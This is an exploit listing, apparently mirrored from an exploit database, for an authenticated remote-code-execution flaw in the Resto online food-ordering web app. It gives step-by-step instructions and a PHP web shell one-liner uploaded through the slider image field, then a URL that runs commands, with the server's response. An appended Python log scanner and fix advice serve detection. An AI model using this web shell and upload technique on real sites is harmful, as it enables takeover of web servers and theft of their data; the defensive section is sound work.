## https://sploitus.com/exploit?id=PACKETSTORM:189546
Title: Resto - Single Vendor Online Food Ordering - Authenticated RCE
Description: Resto Single Vendor Online
Source URL: https://res.newmedilife.in/admin
Source Name/Email: Mehmet Can Kadıoğlu a.k.a mao7un
CVEs: N/A
Software URL: https://www.codester.com/items/53350/resto-single-vendor-online-food-ordering-website
PoC:
1. Log in to the admin panel using the credentials.
2. Navigate to the "Sliders" tab on the victim's website (/admin/slider/).
3. Add a new slider.
4. Create a web shell on the attacker's machine by executing the following command:
   echo "<?php system($_GET['cmd']);?>" > cmd.php
5. Upload the web shell through the "Image" input field.
6. Copy the image path and execute a command using the following URL:
   https://[target]/storage/app/public/admin-assets/images/slider/slider-67c459d300218.php?cmd=id
   Response:
   uid=4204(newmedil) gid=4206(newmedil) groups=4206(newmedil)
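
Detection note (added example, not part of the original advisory or the vendor's code): step 6 shows that a file uploaded through the slider "Image" field keeps a script extension and is reachable under the public slider directory. The Python sketch below scans web server access logs for requests that address a script inside that directory; the combined log format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Upload directory taken from the URL in step 6 of the advisory.
UPLOAD_PREFIX = "/storage/app/public/admin-assets/images/slider/"
# Extensions often mapped to the PHP handler (assumed list; match it to the server config).
SCRIPT_EXTS = {"php", "phtml", "phar", "pht", "php5", "php7"}

# Client address, method, request target and status of a combined-format log entry.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def script_requests(lines, prefix=UPLOAD_PREFIX, exts=SCRIPT_EXTS):
    """Return (client, method, path, status) for every request that addresses
    a server-side script inside the image upload directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format entry
        client, method, target, status = m.groups()
        # Drop the query string and decode %XX so encoded dots cannot hide an extension.
        path = unquote(urlsplit(target).path)
        if not path.lower().startswith(prefix):
            continue
        rest = path[len(prefix):].lower()
        # Inspect every dot-separated part of every segment, so "x.php/extra"
        # (path-info) and "x.php.jpg" (double extension) are both reported.
        parts = {p for seg in rest.split("/") for p in seg.split(".")[1:]}
        if parts & exts:
            hits.append((client, method, path, int(status)))
    return hits

# Constructed sample entries (documentation IP ranges, made-up file names).
SAMPLE = [
    '198.51.100.4 - - [02/Mar/2025:13:19:02 +0000] "GET /admin/slider/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [02/Mar/2025:13:19:05 +0000] "GET /storage/app/public/admin-assets/images/slider/slider-1111111111111.jpg HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Mar/2025:13:20:11 +0000] "GET /storage/app/public/admin-assets/images/slider/slider-0000000000000.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"',
    '203.0.113.7 - - [02/Mar/2025:13:20:40 +0000] "GET /storage/app/public/admin-assets/images/slider/slider-2222222222222.PHP%2Ejpg HTTP/1.1" 404 0 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for hit in script_requests(SAMPLE):
        print(hit)
```

Any hit is worth checking against the files on disk, since an image upload directory should never contain or serve scripts. The same check points at the fix: restrict uploads to an allowlist of image types and disable script execution for the upload directory.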